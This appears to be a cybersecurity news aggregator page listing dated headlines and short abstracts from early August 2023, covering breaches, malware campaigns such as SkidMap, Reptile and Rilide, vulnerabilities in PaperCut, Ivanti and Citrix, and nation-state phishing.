Zoom changed its terms of service requiring users to allow AI to train on all their data without giving them an opt-out option. Zoom updated its terms of service and informed users that it will train its artificial intelligence models using some...Security Affairs
August 7, 2023 – Criminals
Spyware Maker Letmespy Shuts Down After Hacker Deletes Server Data Full Text
Abstract
In a notice on its website in both English and Polish, LetMeSpy confirmed the “permanent shutdown” of the spyware service and that it would cease operations by the end of August.Cyware
August 07, 2023 – Attack
North Korean Hackers Targets Russian Missile Engineering Firm Full Text
Abstract
Two different North Korean nation-state actors have been linked to a cyber intrusion against the major Russian missile engineering company NPO Mashinostroyeniya. Cybersecurity firm SentinelOne said it identified "two instances of North Korea related compromise of sensitive internal IT infrastructure," including a case of an email server compromise and the deployment of a Windows backdoor dubbed OpenCarrot. The breach of the Linux email server has been attributed to ScarCruft . OpenCarrot, on the other hand, is a known implant previously identified as used by the Lazarus Group. The attacks were flagged in mid-May 2022. A rocket design bureau based in Reutov, NPO Mashinostroyeniya was sanctioned by the U.S. Treasury Department in July 2014 in connection to "Russia's continued attempts to destabilize eastern Ukraine and its ongoing occupation of Crimea." While both ScarCruft (aka APT37) and the Lazarus Group are affiliated to North Korea, it's wThe Hacker News
August 7, 2023 – Breach
North Korea compromised Russian missile engineering firm NPO Mashinostroyeniya Full Text
Abstract
Two North Korea-linked APT groups compromised the infrastructure of the major Russian missile engineering firm NPO Mashinostroyeniya. Cybersecurity firm SentinelOne linked the compromise of the major Russian missile engineering firm NPO Mashinostroyeniya...Security Affairs
August 7, 2023 – General
C-Suite, Rank-And-File at Odds Over Security’s Role Full Text
Abstract
A disconnect is brewing between how C-suite executives and cybersecurity workers perceive security’s role, according to a Cloud Security Alliance report released last week. The study by Expel surveyed 1,000 IT and security professionals in May.Cyware
August 07, 2023 – Solution
Enhancing Security Operations Using Wazuh: Open Source XDR and SIEM Full Text
Abstract
In today's interconnected world, evolving security solutions to meet growing demand is more critical than ever. Collaboration across multiple solutions for intelligence gathering and information sharing is indispensable. The idea of multiple-source intelligence gathering stems from the concept that threats are rarely isolated. Hence, their detection and prevention require a comprehensive understanding of the broader landscape. A comprehensive and robust security framework should be established by aggregating resources, knowledge, and expertise from various sources. This collaborative effort allows for the analysis of diverse data sets, the identification of emerging patterns, and the timely dissemination of crucial information. In this article, we discuss a versatile security platform that can operate in two distinct roles within a security ecosystem. This platform can function as a subscriber, actively collecting and aggregating security data from various endpoints and other soThe Hacker News
August 7, 2023 – Malware
A new sophisticated SkidMap variant targets unsecured Redis servers Full Text
Abstract
A new campaign targets Redis servers, this time the malware employed in the attacks is a new variant of the SkidMap malware. Skidmap is a piece of crypto-miner detected by Trend Micro in September 2019 while it was targeting Linux machines. The malicious...Security Affairs
August 7, 2023 – Government
US ‘Lagging Behind’ on Border Gateway Protocol Security Practices, CISA and FCC Chiefs Say Full Text
Abstract
The U.S. government is lagging behind other countries in instituting more stringent cybersecurity measures governing the Border Gateway Protocol (BGP) – a set of technical rules responsible for routing data efficiently.Cyware
August 07, 2023 – Education
New ‘Deep Learning Attack’ Deciphers Laptop Keystrokes with 95% Accuracy Full Text
Abstract
A group of academics has devised a "deep learning-based acoustic side-channel attack" that can be used to classify laptop keystrokes that are recorded using a nearby phone with 95% accuracy. "When trained on keystrokes recorded using the video conferencing software Zoom, an accuracy of 93% was achieved, a new best for the medium," researchers Joshua Harrison, Ehsan Toreini, and Maryam Mehrnezhad said in a new study published last week. Side-channel attacks refer to a class of security exploits that aim to glean insights from a system by monitoring and measuring its physical effects during the processing of sensitive data. Some of the common observable effects include runtime behavior, power consumption, electromagnetic radiation, acoustics, and cache accesses. Although a completely side-channel-free implementation does not exist, practical attacks of this kind can have damaging consequences for user privacy and security as they could be weaponized by a maThe Hacker News
August 7, 2023 – Government
FBI warns of crooks posing as NFT developers in fraudulent schema Full Text
Abstract
The FBI is warning about cyber criminals masquerading as NFT developers to steal cryptocurrency and other digital assets. The U.S. Federal Bureau of Investigation (FBI) is warning about cyber criminals posing as legitimate NFT developers in fraud...Security Affairs
August 7, 2023 – General
VPNs remain a risky gamble for remote access Full Text
Abstract
A new Zscaler report stresses the need for organizations to reevaluate their security posture and migrate to a zero-trust architecture due to the increasing threat of cybercriminals exploiting VPN vulnerabilities.Cyware
August 07, 2023 – Malware
New SkidMap Linux Malware Variant Targeting Vulnerable Redis Servers Full Text
Abstract
Vulnerable Redis services have been targeted by a "new, improved, dangerous" variant of a malware called SkidMap that's engineered to target a wide range of Linux distributions. "The malicious nature of this malware is to adapt to the system on which it is executed," Trustwave security researcher Radoslaw Zdonczyk said in an analysis published last week. Some of the Linux distribution SkidMap sets its eyes on include Alibaba, Anolis, openEuler, EulerOS, Stream, CentOS, RedHat, and Rocky. SkidMap was first disclosed by Trend Micro in September 2019 as a cryptocurrency mining botnet with capabilities to load malicious kernel modules that can obfuscate its activities as well as monitor the miner process. The operators of the malware have also been found camouflaging their backup command-and-control (C2) IP address on the Bitcoin blockchain, evocative of another botnet malware known as Glupteba . "The technique of fetching real-time data from a deThe Hacker News
August 7, 2023 – General
The number of ransomware attacks targeting Finland increased fourfold since it started the process to join NATO Full Text
Abstract
Senior official reports a quadruple increase in ransomware attacks against Finland since it started the process to join NATO. The number of ransomware attacks targeting Finland has increased fourfold since the country began the process of joining...Security Affairs
August 7, 2023 – Malware
Reptile Rootkit Targets Linux Systems in South Korea Full Text
Abstract
Reptile, an open-source kernel module rootkit, designed to target Linux systems was found on GitHub. Unlike typical rootkit malware, Reptile not only conceals its presence but also offers a reverse shell, granting threat actors control over compromised systems. I t is crucial to regularly inspect ... Read MoreCyware
August 07, 2023 – Government
FBI Alert: Crypto Scammers are Masquerading as NFT Developers Full Text
Abstract
The U.S. Federal Bureau of Investigation (FBI) is warning about cyber crooks masquerading as legitimate non-fungible token (NFT) developers to steal cryptocurrency and other digital assets from unsuspecting users. In these fraudulent schemes, criminals either obtain direct access to NFT developer social media accounts or create look-alike accounts to promote "exclusive" new NFT releases, often employing misleading advertising campaigns that create a sense of urgency to pull them off. "Links provided in these announcements are phishing links directing victims to a spoofed website that appears to be a legitimate extension of a particular NFT project," the FBI said in an advisory last week. The replica websites urge potential targets to connect their cryptocurrency wallets and purchase the NFT, only for the threat actors to siphon the funds and NFTs to wallets under their control. "Contents stolen from victims' wallets are often processed through a serThe Hacker News
August 7, 2023 – Solution
Multi-Modal Data Protection With AI’s Help Full Text
Abstract
Multi-modal monitoring through AI enables the identification of both data and conversation types, enhancing the ability to detect and prevent data leakage or any unauthorized activities.Cyware
August 6, 2023 – Vulnerabilities
Microsoft fixed a flaw in Power Platform after being criticized Full Text
Abstract
Microsoft announced it has addressed a critical flaw in its Power Platform after it was criticized for the delay in fixing the issue. Microsoft this week addressed a critical vulnerability in its Power Platform, after it was criticized for the delay...Security Affairs
August 6, 2023 – Breach
Colorado Department of Higher Education (CDHE) discloses data breach after ransomware attack Full Text
Abstract
The Colorado Department of Higher Education (CDHE) finally disclosed a data breach impacting students, past students, and teachers after the June attack. In June a ransomware attack hit the Colorado Department of Higher Education (CDHE), now the organization...Security Affairs
August 6, 2023 – General
Security Affairs newsletter Round 431 by Pierluigi Paganini – International edition Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. Reptile...Security Affairs
August 6, 2023
BlueCharlie changes attack infrastructure in response to reports on its activity Full Text
Abstract
Russia-linked APT group BlueCharlie was observed changing its infrastructure in response to recent reports on its activity. Researchers from Recorded Future reported that Russia-linked APT group BlueCharlie (aka Blue Callisto, Callisto, COLDRIVER,...Security Affairs
August 5, 2023 – Government
CISA Cybersecurity Strategic Plan: An Important Step To Secure Critical Infrastructure Full Text
Abstract
As a founding member of the Network Resilience Coalition, Cisco appreciates CISA’s shared commitment to driving focused attention and investment in efforts to secure and maintain existing critical networked technologies.Cyware
August 05, 2023 – Solution
MDR: Empowering Organizations with Enhanced Security Full Text
Abstract
Managed Detection and Response (MDR) has emerged as a crucial solution for organizations looking to bolster their security measures. MDR allows businesses to outsource the management of Endpoint Detection and Response (EDR) products deployed across their network domain. With real-time threat-hunting capabilities, MDR services detect and mitigate malicious activities on individual endpoints while promptly alerting the service provider's Security Operations Center (SOC) for further investigation. By leveraging the expertise of security specialists, MDR services relieve organizations of the complexities and criticality associated with security operations. Types of MDR Solutions: MDR services come in various forms, tailored to an organization's technology environment and risk requirements. These include: Bring-Your-Own Security Stack / Hybrid Solution: MDR solutions that integrate with existing security products deployed within an environment. Full Vendor-Supplied MDR StaThe Hacker News
August 5, 2023 – Vulnerabilities
CISA, Five Eyes cyber advisory lists common vulnerabilities among 2022’s top exploits Full Text
Abstract
This guidance is the latest released by the Five Eyes organization, which consists of government cybersecurity organizations from the U.S., New Zealand, the U.K., Australia and Canada.Cyware
August 05, 2023 – Malware
Reptile Rootkit: Advanced Linux Malware Targeting South Korean Systems Full Text
Abstract
Threat actors are using an open-source rootkit called Reptile to target Linux systems in South Korea. "Unlike other rootkit malware that typically only provide concealment capabilities, Reptile goes a step further by offering a reverse shell, allowing threat actors to easily take control of systems," the AhnLab Security Emergency Response Center (ASEC) said in a report published this week. "Port knocking is a method where the malware opens a specific port on an infected system and goes on standby. When the threat actor sends a magic packet to the system, the received packet is used as a basis to establish a connection with the C&C server." A rootkit is a malicious software program that's designed to provide privileged, root-level access to a machine while concealing its presence. At least four different campaigns have leveraged Reptile since 2022. The first use of the rootkit was recorded by Trend Micro in May 2022 in connection with an intrusionThe Hacker News
August 5, 2023 – Breach
Millions of people’s healthcare files accessed by Clop gang Full Text
Abstract
The new additions to the victims' list bring the headcount to 514 organizations and more than 36 million individuals, according to Emsisoft threat researchers. It may take months if not years for the full impact and costs to become clear.Cyware
August 05, 2023 – Vulnerabilities
Microsoft Addresses Critical Power Platform Flaw After Delays and Criticism Full Text
Abstract
Microsoft on Friday disclosed that it has addressed a critical security flaw impacting Power Platform , but not before it came under criticism for its failure to swiftly act on it. "The vulnerability could lead to unauthorized access to Custom Code functions used for Power Platform custom connectors," the tech giant said . "The potential impact could be unintended information disclosure if secrets or other sensitive information were embedded in the Custom Code function." The company further noted that no customer action is required and that it found no evidence of active exploitation of the vulnerability in the wild. Tenable, which initially discovered and reported the shortcoming to Redmond on March 30, 2023, said the problem could enable limited, unauthorized access to cross-tenant applications and sensitive data. The cybersecurity firm said the flaw arises as a result of insufficient access control to Azure Function hosts, leading to a scenario where a tThe Hacker News
August 5, 2023 – Outage
Cyberattack disrupts hospital computer systems across US, hindering services Full Text
Abstract
The hack caused chaos in medical facilities in several states. In Connecticut, the emergency departments at Manchester Memorial and Rockville General hospital were closed for much of the day and patients were diverted to other nearby medical centers.Cyware
August 05, 2023 – Vulnerabilities
Researchers Uncover New High-Severity Vulnerability in PaperCut Software Full Text
Abstract
Cybersecurity researchers have discovered a new high-severity security flaw in PaperCut print management software for Windows that could result in remote code execution under specific circumstances. Tracked as CVE-2023-39143 (CVSS score: 8.4), the flaw impacts PaperCut NG/MF prior to version 22.1.3. It has been described as a combination of a path traversal and file upload vulnerability. "CVE-2023-39143 enables unauthenticated attackers to potentially read, delete, and upload arbitrary files to the PaperCut MF/NG application server, resulting in remote code execution in certain configurations," Horizon3.ai's Naveen Sunkavally said . The cybersecurity firm said that file upload leading to remote code execution is possible when the external device integration setting is enabled, which is on by default in some installations of PaperCut. Earlier this April, another remote code execution vulnerability in the same product (CVE-2023-27350, CVSS score: 9.8) and an inforThe Hacker News
August 5, 2023 – Government
Government watchdog finds U.S. embassies running software vulnerable to attacks Full Text
Abstract
The assessment, which GAO began at the end of last year, also found that many State Department posts lack not only a chief information security officer, but any cybersecurity personnel whatsoever.Cyware
August 5, 2023 – Attack
Reptile Rootkit employed in attacks against Linux systems in South Korea Full Text
Abstract
Researchers observed threat actors that are using an open-source rootkit called Reptile in attacks aimed at systems in South Korea. Reptile is an open-source kernel module rootkit that was designed to target Linux systems, unlike other rootkits,...Security Affairs
August 5, 2023 – Malware
Malicious packages in the NPM designed for highly-targeted attacks Full Text
Abstract
The files and directories targeted by the malicious code could potentially contain developers' sensitive data. Researchers speculate the packages are part of a highly-targeted attack on developers working in the cryptocurrency sector.Cyware
August 5, 2023 – Vulnerabilities
New PaperCut flaw in print management software exposes servers to RCE attacks Full Text
Abstract
Researchers discovered a vulnerability in PaperCut NG/MF print management software that can lead to remote code execution. Cybersecurity researchers at Horizon3 discovered a high-severity vulnerability, tracked as CVE-2023-39143 (CVSS score: 8.4),...Security Affairs
August 4, 2023 – Breach
Mondee Security Lapse Exposed Flight Itineraries and Unencrypted Credit Card Numbers Full Text
Abstract
The database, hosted on Oracle’s cloud and more than 1.7 terabytes in size at the time it was exposed, contained customer’s personal information, including names, gender, dates of birth, home addresses, flight information and passport numbers.Cyware
August 04, 2023 – Policy and Law
NYC Couple Pleads Guilty to Money Laundering in $3.6 Billion Bitfinex Hack Full Text
Abstract
A married couple from New York City has pleaded guilty to money laundering charges in connection with the 2016 hack of cryptocurrency stock exchange Bitfinex, resulting in the theft of about 120,000 bitcoin. The development comes more than a year after Ilya Lichtenstein, 35, and his wife, Heather Morgan, 33, were arrested in February 2022 , following the seizure of roughly 95,000 of the stolen crypto assets that were held by the defendants. The funds were valued at $3.6 billion at the time. Since then, the U.S. government said it has since seized another approximately $475 million tied to the breach. "Lichtenstein used a number of advanced hacking tools and techniques to gain access to Bitfinex's network," the U.S. Department of Justice (DoJ) said . "Once inside their systems, Lichtenstein fraudulently authorized more than 2,000 transactions in which 119,754 bitcoin was transferred from Bitfinex to a cryptocurrency wallet in Lichtenstein's control."The Hacker News
August 4, 2023 – Outage
A cyberattack impacted operations of multiple hospitals in several US states Full Text
Abstract
A cyberattack has disrupted the computer systems of multiple hospitals in several states, with a severe impact on their operations. Some emergency rooms in multiple hospitals in several states were forced to close and ambulances were diverted due to a cyberattack...Security Affairs
August 4, 2023 – Outage
Hawai’I’s Gemini North Observatory Suspends Operations Following Cyberattack Full Text
Abstract
The National Science Foundation’s NOIRLab did not respond to requests for comment but published a notice on Tuesday night explaining that the lab had discovered an attempted cyberattack on its systems that morning.Cyware
August 04, 2023 – Education
Webinar - Making PAM Great Again: Solving the Top 5 Identity Team PAM Challenges Full Text
Abstract
Privileged Access Management (PAM) solutions are widely acknowledged as the gold standard for securing critical privileged accounts. However, many security and identity teams face inherent obstacles during the PAM journey, hindering these solutions from reaching their full potential. These challenges deprive organizations of the resilience they seek, making it essential to address them effectively. Discover how you can enhance your PAM strategy in our upcoming webinar: " Solving the Top 5 PAM Pain Points Plaguing Identity Teams ," featuring Yiftach Keshet from Silverfort. Reserve your spot now [Register here] to gain invaluable insights. Gain insights into: Key Challenges: Identify the primary challenges identity teams encounter when implementing PAM solutions. Solutions & Approaches: Discover different strategies to effectively overcome these challenges and enhance your security posture. Unified Identity Protection: Learn how combining Unified Identity ProtectioThe Hacker News
August 4, 2023 – Criminals
Married couple pleaded guilty to laundering billions in cryptocurrency stolen from Bitfinex in 2016 Full Text
Abstract
A married couple from New York pleaded guilty this week to laundering billions of dollars stolen from Bitfinex in 2016. The couple pleaded guilty to money laundering charges in connection with the hack of the cryptocurrency stock exchange Bitfinex...Security Affairs
August 4, 2023 – Malware
Rilide Stealer Evolves to Target Chrome Extension Manifest V3 Full Text
Abstract
A rather sophisticated version of the Rilide malware was identified targeting Chromium-based web browsers to steal sensitive data and cryptocurrency. Experts identified over 1,300 phishing websites distributing the new version of Rilide Stealer along with other harmful malware such as Bu ... Read MoreCyware
August 04, 2023 – Malware
Malicious npm Packages Found Exfiltrating Sensitive Data from Developers Full Text
Abstract
Cybersecurity researchers have discovered a new bunch of malicious packages on the npm package registry that are designed to exfiltrate sensitive developer information. Software supply chain firm Phylum, which first identified the "test" packages on July 31, 2023, said they "demonstrated increasing functionality and refinement," hours after which they were removed and re-uploaded under different, legitimate-sounding package names. While the end goal of the undertaking is not clear, it's suspected to be a highly targeted campaign aimed at the cryptocurrency sector based on references to modules such as "rocketrefer" and "binarium." All the packages were published by the npm user malikrukd4732. A common feature across all the modules is the ability to launch JavaScript ("index.js") that's equipped to exfiltrate valuable information to a remote server. "The index.js code is spawned in a child process by the preinstall.jThe Hacker News
August 4, 2023 – Malware
Malicious packages in the NPM designed for highly-targeted attacks Full Text
Abstract
Researchers discovered a new set of malicious packages on the npm package manager that can exfiltrate sensitive developer data. On July 31, 2023, Phylum researchers observed the publication of ten different "test" packages on the npm package manager...Security Affairs
August 4, 2023 – Insider Threat
Burger King Forgets to put a Password on Their Systems, Again Full Text
Abstract
On June 1st, 2023, the Cybernews research team discovered a publicly accessible environment file (.env) belonging to Burger King’s French website, containing various credentials. The file was hosted on the subdomain used for posting job offers.Cyware
August 04, 2023 – Government
Major Cybersecurity Agencies Collaborate to Unveil 2022’s Most Exploited Vulnerabilities Full Text
Abstract
A four-year-old critical security flaw impacting Fortinet FortiOS SSL has emerged as one of the most routinely and frequently exploited vulnerabilities in 2022. "In 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems," cybersecurity and intelligence agencies from the Five Eyes nations, which comprises Australia, Canada, New Zealand, the U.K., and the U.S., said in a joint alert. The continued weaponization of CVE-2018-13379 , which was also one among the most exploited bugs in 2020 and 2021 , suggests a failure on the part of organizations to apply patches in a timely manner, the authorities said. "Malicious cyber actors likely prioritize developing exploits for severe and globally prevalent CVEs," according to the advisory. "While sophisticated actors also develop tools to exploit other vulnerabilities, developing exploits for criThe Hacker News
August 4, 2023 – Attack
Attackers use dynamic code loading to bypass Google Play store’s malware detections Full Text
Abstract
Threat actors rely on the 'versioning' technique to evade malware detections of malicious code uploaded to the Google Play Store. Google Cybersecurity Action Team (GCAT) revealed that threat actors are using a technique called versioning to evade...Security Affairs
August 4, 2023 – Encryption
SCARF Cipher Sets New Standards in Protecting Sensitive Data Full Text
Abstract
The cipher, designed by Assistant Professor Rei Ueno from the Research Institute of Electrical Communication at Tohoku University, addresses the threat of cache side-channel attacks, offering enhanced security and exceptional performance.Cyware
August 4, 2023 – Government
CISA, FBI, and NSA published the list of 12 most exploited vulnerabilities of 2022 Full Text
Abstract
CISA, the FBI, and NSA, along with Five Eyes cybersecurity agencies published a list of the 12 most exploited vulnerabilities of 2022. CISA, the NSA, and the FBI, in collaboration with cybersecurity authorities from Australia, Canada, New Zealand,...Security Affairs
August 4, 2023 – General
These Are the Top Five Cloud Security Risks, Qualys Says Full Text
Abstract
The five key risk areas are misconfigurations, external-facing vulnerabilities, weaponized vulnerabilities, malware inside a cloud environment, and remediation lag (that is, delays in patching).Cyware
August 3, 2023 – Vulnerabilities
Google Chrome 115 Update Patches V8 JavaScript and WebAssembly Engine Vulnerabilities Full Text
Abstract
The browser update resolves three high-severity type confusion bugs in the V8 JavaScript and WebAssembly engine that earned the reporting researchers over $60,000 in bug bounties, Google notes in its advisory.Cyware
August 03, 2023 – Malware
Malicious Apps Use Sneaky Versioning Technique to Bypass Google Play Store Scanners Full Text
Abstract
Threat actors are leveraging a technique called versioning to evade Google Play Store's malware detections and target Android users. "Campaigns using versioning commonly target users' credentials, data, and finances," Google Cybersecurity Action Team (GCAT) s aid in its August 2023 Threat Horizons Report shared with The Hacker News. While versioning is not a new phenomenon, it's sneaky and hard to detect. In this method, a developer releases an initial version of an app on the Play Store that passes Google's pre-publication checks, but is later updated with a malware component. This is achieved by pushing an update from an attacker-controlled server to serve malicious code on the end user device using a method called dynamic code loading (DCL), effectively turning the app into a backdoor. Earlier this May, ESET discovered a screen recording app named "iRecorder - Screen Recorder" that remained innocuous for nearly a year after it was firstThe Hacker News
August 3, 2023 – Vulnerabilities
Decommissioned medical infusion pumps sold on secondary market could reveal Wi-Fi configuration settings Full Text
Abstract
Experts warn that decommissioned medical infusion pumps sold via the secondary market could expose Wi-Fi configuration settings. The sale of decommissioned medical infusion pumps through the secondary market may lead to the potential exposure of Wi-Fi...Security Affairs
August 3, 2023 – Breach
Canadian Healthcare Workers’ Private Information Subject to Data Breach Full Text
Abstract
Hackers had access to the HEABC system from May 9 to June 10 and the breach wasn’t detected until July 13, according to the association, after staff “identified a potential anomaly” but did not provide further explanation.Cyware
August 03, 2023 – Malware
New Version of Rilide Data Theft Malware Adapts to Chrome Extension Manifest V3 Full Text
Abstract
Cybersecurity researchers have discovered a new version of malware called Rilide that targets Chromium-based web browsers to steal sensitive data and steal cryptocurrency. "It exhibits a higher level of sophistication through modular design, code obfuscation, adoption to the Chrome Extension Manifest V3 , and additional features such as the ability to exfiltrate stolen data to a Telegram channel or interval-based screenshot captures," Trustwave security researcher Pawel Knapczyk said in a report shared with The Hacker News. Rilide was first documented by the cybersecurity company in April 2023, uncovering two different attack chains that made use of Ekipa RAT and Aurora Stealer to deploy rogue browser extensions capable of data and crypto theft. It's sold on dark web forums by an actor named "friezer" for $5,000. The malware is equipped with a wide range of features that allow it to disable other browser add-ons, harvest browsing history and cookies,The Hacker News
August 3, 2023 – General
OWASP Top 10 for LLM (Large Language Model) applications is out! Full Text
Abstract
The OWASP Top 10 for LLM (Large Language Model) Applications version 1.0 is out, it focuses on the potential security risks when using LLMs. OWASP released the OWASP Top 10 for LLM (Large Language Model) Applications project, which provides a list...Security Affairs
August 3, 2023 – Business
Threat Intelligence Provider Cyble Raises $24 Million in Series B Funding Full Text
Abstract
The new funding round was co-led by Blackbird Ventures and King River Capital, with participation from January Capital, Spider Capital, Summit Peak Ventures, and other investors.Cyware
August 03, 2023 – Attack
Hundreds of Citrix NetScaler ADC and Gateway Servers Hacked in Major Cyber Attack Full Text
Abstract
Hundreds of Citrix NetScaler ADC and Gateway servers have been breached by malicious actors to deploy web shells, according to the Shadowserver Foundation. The non-profit said the attacks take advantage of CVE-2023-3519 , a critical code injection vulnerability that could lead to unauthenticated remote code execution. The flaw, patched by Citrix last month, carries a CVSS score of 9.8. The largest number of impacted IP addresses are based in Germany, followed by France, Switzerland, Italy, Sweden, Spain, Japan, China, Austria, and Brazil. The exploitation of CVE-2023-3519 to deploy web shells was previously disclosed by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), which said the attack was directed against an unnamed critical infrastructure organization in June 2023. The disclosure comes as GreyNoise said it detected three IP addresses attempting to exploit CVE-2023-24489 (CVSS score: 9.1), another critical flaw in Citrix ShareFile software thatThe Hacker News
August 3, 2023 – Vulnerabilities
Rapid7 found a bypass for the recently patched actively exploited Ivanti EPMM bug Full Text
Abstract
Researchers discovered a bypass for a recently fixed actively exploited vulnerability in Ivanti Endpoint Manager Mobile (EPMM). Rapid7 cybersecurity researchers have discovered a bypass for the recently patched actively exploited vulnerability in Ivanti...Security Affairs
August 3, 2023 – Breach
Pennsylvania County Says Data Breach May Have Exposed 690,000 People’s Personal Information Full Text
Abstract
The county says it, along with 22 million people worldwide, has been targeted by a global cyber security breach. The breach gave a group of cybercriminals access to personal information like driver's license numbers and Social Security numbers.Cyware
August 03, 2023 – Solution
A Penetration Testing Buyer’s Guide for IT Security Teams Full Text
Abstract
The frequency and complexity of cyber threats are constantly evolving. At the same time, organizations are now collecting sensitive data that, if compromised, could result in severe financial and reputational damage. According to Cybersecurity Ventures , the cost of cybercrime is predicted to hit $8 trillion in 2023 and will grow to $10.5 trillion by 2025. There is also increasing public and regulatory scrutiny over data protection. Compliance regulations (such as PCI DSS and ISO 27001), as well as the need for a better understanding of your cybersecurity risks, are driving the need to conduct regular penetration tests. Pen testing helps to identify security flaws in your IT infrastructure before threat actors can detect and exploit them. This gives you visibility into the risks posed by potential attacks and enables you to take swift corrective action to address them. Here, we outline key factors to consider before, during, and post the penetration testing process. Pre-PenetratiThe Hacker News
August 3, 2023
Russian APT29 conducts phishing attacks through Microsoft Teams Full Text
Abstract
Russia-linked APT29 group targeted dozens of organizations and government agencies worldwide with Microsoft Teams phishing attacks. Microsoft Threat Intelligence reported that Russia-linked cyberespionage group APT29 (aka SVR group, Cozy Bear, Nobelium,...Security Affairs
August 3, 2023 – Attack
Russian Hacker Group NoName057(16) Claim Attacks on Italian Banks, Government Agencies Full Text
Abstract
A pro-Russian hacking group has claimed responsibility for cyberattacks on Italian banks, businesses, and government agencies which flooded networks and disrupted services.Cyware
August 03, 2023 – General
Microsoft Flags Growing Cybersecurity Concerns for Major Sporting Events Full Text
Abstract
Microsoft is warning of the threat malicious cyber actors pose to stadium operations, warning that the cyber risk surface of live sporting events is "rapidly expanding." "Information on athletic performance, competitive advantage, and personal information is a lucrative target," the company said in a Cyber Signals report shared with The Hacker News. "Sports teams, major league and global sporting associations, and entertainment venues house a trove of valuable information desirable to cybercriminals." "Unfortunately, this information can be vulnerable at-scale, due to the number of connected devices and interconnected networks in these environments." The company specifically singled out hospitals delivering critical support and health services for fans and players as being targets of ransomware attacks, resulting in service disruptions. To defend against such attacks, Microsoft is recommending that - Companies disable unnecessary ports aThe Hacker News
August 3, 2023 – General
Report: One in 100 Emails is Malicious Full Text
Abstract
With the ever-increasing reliance on workplace technologies, including web-based tools and SaaS applications, organizations face an unparalleled need to strengthen their cybersecurity measures.Cyware
August 03, 2023 – Denial Of Service
“Mysterious Team Bangladesh” Targeting India with DDoS Attacks and Data Breaches Full Text
Abstract
A hacktivist group known as Mysterious Team Bangladesh has been linked to over 750 distributed denial-of-service (DDoS) attacks and 78 website defacements since June 2022. "The group most frequently attacks logistics, government, and financial sector organizations in India and Israel," Singapore-headquartered cybersecurity firm Group-IB said in a report shared with The Hacker News. "The group is primarily driven by religious and political motives." Some of the other targeted countries include Australia, Senegal, the Netherlands, Sweden, and Ethiopia. In addition, the threat actor is said to have gained access to web servers and administrative panels, likely by exploiting known security flaws or poorly-secured passwords. Mysterious Team Bangladesh, as the name indicates, is suspected to be of Bangladeshi origin. "We are working to protect Our Bangladesh Cyberspace," the group's Intro on Facebook reads . The group has an active social media preThe Hacker News
August 3, 2023 – Malware
New Variants of NodeStealer Found Infecting Facebook Business Accounts Full Text
Abstract
Unit 42 researchers discovered a previously unreported phishing campaign targeting Facebook business accounts. The campaign distributed new variants of NodeStealer malware that could fully take over these accounts, steal cryptocurrency, and download further payloads. This type of attack can cause b ... Read MoreCyware
August 03, 2023 – Phishing
Microsoft Exposes Russian Hackers’ Sneaky Phishing Tactics via Microsoft Teams Chats Full Text
Abstract
Microsoft on Wednesday disclosed that it identified a set of highly targeted social engineering attacks mounted by a Russian nation-state threat actor using credential theft phishing lures sent as Microsoft Teams chats. The tech giant attributed the attacks to a group it tracks as Midnight Blizzard (previously Nobelium). It's also called APT29, BlueBravo, Cozy Bear, Iron Hemlock, and The Dukes. "In this latest activity, the threat actor uses previously compromised Microsoft 365 tenants owned by small businesses to create new domains that appear as technical support entities," the company said . "Using these domains from compromised tenants, Midnight Blizzard leverages Teams messages to send lures that attempt to steal credentials from a targeted organization by engaging a user and eliciting approval of multi-factor authentication (MFA) prompts." Microsoft said the campaign, observed since at least late May 2023, affected less than 40 organizations globalThe Hacker News
August 03, 2023 – Vulnerabilities
Researchers Discover Bypass for Recently Patched Critical Ivanti EPMM Vulnerability Full Text
Abstract
Cybersecurity researchers have discovered a bypass for a recently fixed actively exploited vulnerability in some versions of Ivanti Endpoint Manager Mobile (EPMM), prompting Ivanti to urge users to update to the latest version of the software. Tracked as CVE-2023-35082 (CVSS score: 10.0) and discovered by Rapid7, the issue "allows unauthenticated attackers to access the API in older unsupported versions of MobileIron Core (11.2 and below)." "If exploited, this vulnerability enables an unauthorized, remote (internet-facing) actor to potentially access users' personally identifiable information and make limited changes to the server," Ivanti said in an advisory released on August 2, 2023. Rapid7 security researcher Stephen Fewer said , "CVE-2023-35082 arises from the same place as CVE-2023-35078, specifically the permissive nature of certain entries in the mifs web application's security filter chain." With the latest disclosure, Ivanti hasThe Hacker News
August 2, 2023 – Breach
Hackers already installed web shells on 581 Citrix servers in CVE-2023-3519 attacks Full Text
Abstract
Researchers warn that hundreds of Citrix servers have been hacked in an ongoing campaign exploiting the RCE CVE-2023-3519. Security researchers from the non-profit organization Shadowserver Foundation reported that hundreds of Citrix Netscaler ADC and Gateway...Security Affairs
August 2, 2023 – Cryptocurrency
Millions Stolen From Crypto Platforms Through Exploited ‘Vyper’ Vulnerability Full Text
Abstract
Millions of dollars worth of cryptocurrency were stolen from several platforms over the weekend after hackers exploited a vulnerability in a programming language used widely in the cryptocurrency world.Cyware
August 2, 2023 – Phishing
Zero-day in Salesforce email services exploited in targeted Facebook phishing campaign Full Text
Abstract
Experts spotted a spear-phishing Facebook campaign exploiting a zero-day vulnerability in Salesforce email services. Researchers from Guardio Labs uncovered a sophisticated phishing campaign exploiting a zero-day vulnerability in Salesforce email...Security Affairs
August 2, 2023 – General
The Gap in Users’ Identity Security Knowledge Gives Cybercriminals an Opening Full Text
Abstract
With exponential growth in the number of human and machine actors on the network and more sophisticated technology in more places, identity in this new era is rapidly becoming a super-human problem, according to RSA.Cyware
August 02, 2023 – Hacker
Russian Cyber Adversary BlueCharlie Alters Infrastructure in Response to Disclosures Full Text
Abstract
A Russia-nexus adversary has been linked to 94 new domains starting March 2023, suggesting that the group is actively modifying its infrastructure in response to public disclosures about its activities. Cybersecurity firm Recorded Future linked the revamped infrastructure to a threat actor it tracks under the name BlueCharlie , a hacking crew that's broadly known by the names Blue Callisto, Callisto (or Calisto), COLDRIVER, Star Blizzard (formerly SEABORGIUM), and TA446. BlueCharlie was previously given the temporary designation Threat Activity Group 53 (TAG-53). "These shifts demonstrate that these threat actors are aware of industry reporting and show a certain level of sophistication in their efforts to obfuscate or modify their activity, aiming to stymie security researchers," the company said in a technical report shared with The Hacker News. BlueCharlie is assessed to be affiliated with Russia's Federal Security Service (FSB), with the threat actor linkedThe Hacker News
August 2, 2023 – Breach
Burger King forgets to put a password on their systems, again Full Text
Abstract
